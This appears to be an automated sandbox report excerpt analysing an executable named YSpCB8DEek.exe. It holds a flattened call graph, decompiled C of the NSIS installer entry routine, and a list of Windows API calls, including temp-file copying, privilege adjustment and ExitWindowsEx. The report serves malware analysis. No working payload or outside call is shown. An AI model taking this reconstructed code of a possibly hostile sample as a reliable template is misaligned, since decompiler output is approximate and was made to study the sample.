4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 
406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 
4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 
404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW 
SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 
4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 

                            Control-flow Graph

                            [Control-flow graph of the function starting at 0x403640 (_entry_); nodes are marked Executed or Not Executed. Graph image not recoverable.]
                            C-Code - Quality: 78%
                            			_entry_() {
                            				WCHAR* _v8;
                            				signed int _v12;
                            				void* _v16;
                            				signed int _v20;
                            				int _v24;
                            				int _v28;
                            				struct _TOKEN_PRIVILEGES _v40;
                            				signed char _v42;
                            				int _v44;
                            				signed int _v48;
                            				intOrPtr _v278;
                            				signed short _v310;
                            				struct _OSVERSIONINFOW _v324;
                            				struct _SHFILEINFOW _v1016;
                            				intOrPtr* _t88;
                            				WCHAR* _t92;
                            				char* _t94;
                            				void _t97;
                            				void* _t116;
                            				WCHAR* _t118;
                            				signed int _t119;
                            				intOrPtr* _t123;
                            				void* _t137;
                            				void* _t143;
                            				void* _t148;
                            				void* _t152;
                            				void* _t157;
                            				signed int _t167;
                            				void* _t170;
                            				void* _t175;
                            				intOrPtr _t177;
                            				intOrPtr _t178;
                            				intOrPtr* _t179;
                            				int _t188;
                            				void* _t189;
                            				void* _t198;
                            				signed int _t204;
                            				signed int _t209;
                            				signed int _t214;
                            				signed int _t216;
                            				int* _t218;
                            				signed int _t226;
                            				signed int _t229;
                            				CHAR* _t231;
                            				char* _t232;
                            				signed int _t233;
                            				WCHAR* _t234;
                            				void* _t250;
                            
                            				_t216 = 0x20;
                            				_t188 = 0;
                            				_v24 = 0;
                            				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
                            				_v20 = 0;
                            				SetErrorMode(0x8001); // executed
                            				_v324.szCSDVersion = 0;
                            				_v48 = 0;
                            				_v44 = 0;
                            				_v324.dwOSVersionInfoSize = 0x11c;
                            				if(GetVersionExW( &_v324) == 0) {
                            					_v324.dwOSVersionInfoSize = 0x114;
                            					GetVersionExW( &_v324);
                            					asm("sbb eax, eax");
                            					_v42 = 4;
                            					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
                            				}
                            				if(_v324.dwMajorVersion < 0xa) {
                            					_v310 = _v310 & 0x00000000;
                            				}
                            				 *0x42a318 = _v324.dwBuildNumber;
                            				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
                            				if( *0x42a31e != 0x600) {
                            					_t179 = E00406A35(_t188);
                            					if(_t179 != _t188) {
                            						 *_t179(0xc00);
                            					}
                            				}
                            				_t231 = "UXTHEME";
                            				do {
                            					E004069C5(_t231); // executed
                            					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
                            				} while ( *_t231 != 0);
                            				E00406A35(0xb);
                            				 *0x42a264 = E00406A35(9);
                            				_t88 = E00406A35(7);
                            				if(_t88 != _t188) {
                            					_t88 =  *_t88(0x1e);
                            					if(_t88 != 0) {
                            						 *0x42a31c =  *0x42a31c | 0x00000080;
                            					}
                            				}
                            				__imp__#17();
                            				__imp__OleInitialize(_t188); // executed
                            				 *0x42a320 = _t88;
                            				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
                            				E00406668(0x429260, L"NSIS Error");
                            				_t92 = GetCommandLineW();
                            				_t232 = L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"";
                            				E00406668(_t232, _t92);
                            				_t94 = _t232;
                            				_t233 = 0x22;
                            				 *0x42a260 = 0x400000;
                            				_t250 = L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"" - _t233; // 0x22
                            				if(_t250 == 0) {
                            					_t216 = _t233;
                            					_t94 =  &M00435002;
                            				}
                            				_t198 = CharNextW(E00405F64(_t94, _t216));
                            				_v16 = _t198;
                            				while(1) {
                            					_t97 =  *_t198;
                            					_t251 = _t97 - _t188;
                            					if(_t97 == _t188) {
                            						break;
                            					}
                            					_t209 = 0x20;
                            					__eflags = _t97 - _t209;
                            					if(_t97 != _t209) {
                            						L17:
                            						__eflags =  *_t198 - _t233;
                            						_v12 = _t209;
                            						if( *_t198 == _t233) {
                            							_v12 = _t233;
                            							_t198 = _t198 + 2;
                            							__eflags = _t198;
                            						}
                            						__eflags =  *_t198 - 0x2f;
                            						if( *_t198 != 0x2f) {
                            							L32:
                            							_t198 = E00405F64(_t198, _v12);
                            							__eflags =  *_t198 - _t233;
                            							if(__eflags == 0) {
                            								_t198 = _t198 + 2;
                            								__eflags = _t198;
                            							}
                            							continue;
                            						} else {
                            							_t198 = _t198 + 2;
                            							__eflags =  *_t198 - 0x53;
                            							if( *_t198 != 0x53) {
                            								L24:
                            								asm("cdq");
                            								asm("cdq");
                            								_t214 = L"NCRC" & 0x0000ffff;
                            								asm("cdq");
                            								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
                            								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
                            								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
                            									L29:
                            									asm("cdq");
                            									asm("cdq");
                            									_t209 = L" /D=" & 0x0000ffff;
                            									asm("cdq");
                            									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
                            									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
                            									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
                            										L31:
                            										_t233 = 0x22;
                            										goto L32;
                            									}
                            									__eflags =  *_t198 - _t229;
                            									if( *_t198 == _t229) {
                            										 *(_t198 - 4) = _t188;
                            										__eflags = _t198;
                            										E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t198);
                            										L37:
                            										_t234 = L"C:\\Users\\alfons\\AppData\\Local\\Temp\\";
                            										GetTempPathW(0x400, _t234);
                            										_t116 = E0040360F(_t198, _t251);
                            										_t252 = _t116;
                            										if(_t116 != 0) {
                            											L40:
                            											DeleteFileW(L"1033"); // executed
                            											_t118 = E004030D0(_t254, _v20); // executed
                            											_v8 = _t118;
                            											if(_t118 != _t188) {
                            												L68:
                            												ExitProcess(); // executed
                            												__imp__OleUninitialize(); // executed
                            												if(_v8 == _t188) {
                            													if( *0x42a2f4 == _t188) {
                            														L77:
                            														_t119 =  *0x42a30c;
                            														if(_t119 != 0xffffffff) {
                            															_v24 = _t119;
                            														}
                            														ExitProcess(_v24);
                            													}
                            													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
                            														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
                            														_v40.PrivilegeCount = 1;
                            														_v28 = 2;
                            														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
                            													}
                            													_t123 = E00406A35(4);
                            													if(_t123 == _t188) {
                            														L75:
                            														if(ExitWindowsEx(2, 0x80040002) != 0) {
                            															goto L77;
                            														}
                            														goto L76;
                            													} else {
                            														_push(0x80040002);
                            														_push(0x25);
                            														_push(_t188);
                            														_push(_t188);
                            														_push(_t188);
                            														if( *_t123() == 0) {
                            															L76:
                            															E0040140B(9);
                            															goto L77;
                            														}
                            														goto L75;
                            													}
                            												}
                            												E00405CC8(_v8, 0x200010);
                            												ExitProcess(2);
                            											}
                            											if( *0x42a27c == _t188) {
                            												L51:
                            												 *0x42a30c =  *0x42a30c | 0xffffffff;
                            												_v24 = E00403D17(_t264);
                            												goto L68;
                            											}
                            											_t218 = E00405F64(L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"", _t188);
                            											if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
                            												L48:
                            												_t263 = _t218 - L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"";
                            												_v8 = L"Error launching installer";
                            												if(_t218 < L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
                            													_t189 = E00405C33(__eflags);
                            													lstrcatW(_t234, L"~nsu");
                            													__eflags = _t189;
                            													if(_t189 != 0) {
                            														lstrcatW(_t234, "A");
                            													}
                            													lstrcatW(_t234, L".tmp");
                            													_t137 = lstrcmpiW(_t234, 0x436800);
                            													__eflags = _t137;
                            													if(_t137 == 0) {
                            														L67:
                            														_t188 = 0;
                            														__eflags = 0;
                            														goto L68;
                            													} else {
                            														__eflags = _t189;
                            														_push(_t234);
                            														if(_t189 == 0) {
                            															E00405C16();
                            														} else {
                            															E00405B99();
                            														}
                            														SetCurrentDirectoryW(_t234);
                            														__eflags = L"C:\\Users\\alfons\\AppData\\Local\\Temp"; // 0x43
                            														if(__eflags == 0) {
                            															E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", 0x436800);
                            														}
                            														E00406668(0x42b000, _v16);
                            														_t201 = "A" & 0x0000ffff;
                            														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                            														__eflags = _t143;
                            														_v12 = 0x1a;
                            														 *0x42b800 = _t143;
                            														do {
                            															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
                            															DeleteFileW(0x420f08);
                            															__eflags = _v8;
                            															if(_v8 != 0) {
                            																_t148 = CopyFileW(L"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe", 0x420f08, 1);
                            																__eflags = _t148;
                            																if(_t148 != 0) {
                            																	E00406428(_t201, 0x420f08, 0);
                            																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
                            																	_t152 = E00405C4B(0x420f08);
                            																	__eflags = _t152;
                            																	if(_t152 != 0) {
                            																		CloseHandle(_t152);
                            																		_v8 = 0;
                            																	}
                            																}
                            															}
                            															 *0x42b800 =  *0x42b800 + 1;
                            															_t61 =  &_v12;
                            															 *_t61 = _v12 - 1;
                            															__eflags =  *_t61;
                            														} while ( *_t61 != 0);
                            														E00406428(_t201, _t234, 0);
                            														goto L67;
                            													}
                            												}
                            												 *_t218 = _t188;
                            												_t221 =  &(_t218[2]);
                            												_t157 = E0040603F(_t263,  &(_t218[2]));
                            												_t264 = _t157;
                            												if(_t157 == 0) {
                            													goto L68;
                            												}
                            												E00406668(L"C:\\Users\\alfons\\AppData\\Local\\Temp", _t221);
                            												E00406668(0x436000, _t221);
                            												_v8 = _t188;
                            												goto L51;
                            											}
                            											asm("cdq");
                            											asm("cdq");
                            											asm("cdq");
                            											_t204 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                            											_t167 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t209 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
                            											while( *_t218 != _t204 || _t218[1] != _t167) {
                            												_t218 = _t218;
                            												if(_t218 >= L"\"C:\\Users\\alfons\\Desktop\\YSpCB8DEek.exe\"") {
                            													continue;
                            												}
                            												break;
                            											}
                            											_t188 = 0;
                            											goto L48;
                            										}
                            										GetWindowsDirectoryW(_t234, 0x3fb);
                            										lstrcatW(_t234, L"\\Temp");
                            										_t170 = E0040360F(_t198, _t252);
                            										_t253 = _t170;
                            										if(_t170 != 0) {
                            											goto L40;
                            										}
                            										GetTempPathW(0x3fc, _t234);
                            										lstrcatW(_t234, L"Low");
                            										SetEnvironmentVariableW(L"TEMP", _t234);
                            										SetEnvironmentVariableW(L"TMP", _t234);
                            										_t175 = E0040360F(_t198, _t253);
                            										_t254 = _t175;
                            										if(_t175 == 0) {
                            											goto L68;
                            										}
                            										goto L40;
                            									}
                            									goto L31;
                            								}
                            								__eflags =  *((intOrPtr*)(_t198 + 4)) - _t226;
                            								if( *((intOrPtr*)(_t198 + 4)) != _t226) {
                            									goto L29;
                            								}
                            								_t177 =  *((intOrPtr*)(_t198 + 8));
                            								__eflags = _t177 - 0x20;
                            								if(_t177 == 0x20) {
                            									L28:
                            									_t36 =  &_v20;
                            									 *_t36 = _v20 | 0x00000004;
                            									__eflags =  *_t36;
                            									goto L29;
                            								}
                            								__eflags = _t177 - _t188;
                            								if(_t177 != _t188) {
                            									goto L29;
                            								}
                            								goto L28;
                            							}
                            							_t178 =  *((intOrPtr*)(_t198 + 2));
                            							__eflags = _t178 - _t209;
                            							if(_t178 == _t209) {
                            								L23:
                            								 *0x42a300 = 1;
                            								goto L24;
                            							}
                            							__eflags = _t178 - _t188;
                            							if(_t178 != _t188) {
                            								goto L24;
                            							}
                            							goto L23;
                            						}
                            					} else {
                            						goto L16;
                            					}
                            					do {
                            						L16:
                            						_t198 = _t198 + 2;
                            						__eflags =  *_t198 - _t209;
                            					} while ( *_t198 == _t209);
                            					goto L17;
                            				}
                            				goto L37;
                            			}

                            APIs
                            • SetErrorMode.KERNELBASE(00008001), ref: 00403663
                            • GetVersionExW.KERNEL32(?), ref: 0040368C
                            • GetVersionExW.KERNEL32(0000011C), ref: 004036A3
                            • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040373A
                            • #17.COMCTL32(00000007,00000009,0000000B), ref: 00403776
                            • OleInitialize.OLE32(00000000), ref: 0040377D
                            • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 0040379B
                            • GetCommandLineW.KERNEL32(00429260,NSIS Error), ref: 004037B0
                            • CharNextW.USER32(00000000,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000020,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000000), ref: 004037E9
                            • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,?), ref: 0040391C
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040392D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403939
                            • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040394D
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403955
                            • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403966
                            • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040396E
                            • DeleteFileW.KERNELBASE(1033), ref: 00403982
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403A69
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 00403A78
                              • Part of subcall function 00405C16: CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403A83
                            • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,00436800,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\YSpCB8DEek.exe",00000000,?), ref: 00403A8F
                            • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403AAF
                            • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,?), ref: 00403B0E
                            • CopyFileW.KERNEL32(C:\Users\user\Desktop\YSpCB8DEek.exe,00420F08,00000001), ref: 00403B21
                            • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000), ref: 00403B4E
                            • ExitProcess.KERNEL32(?), ref: 00403B6C
                            • OleUninitialize.OLE32(?), ref: 00403B71
                            • ExitProcess.KERNEL32 ref: 00403B8B
                            • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403B9F
                            • OpenProcessToken.ADVAPI32(00000000), ref: 00403BA6
                            • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403BBA
                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00403BD9
                            • ExitWindowsEx.USER32(00000002,80040002), ref: 00403BFE
                            • ExitProcess.KERNEL32 ref: 00403C1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322678692.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.322773729.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_400000_YSpCB8DEek.jbxd
                            Similarity
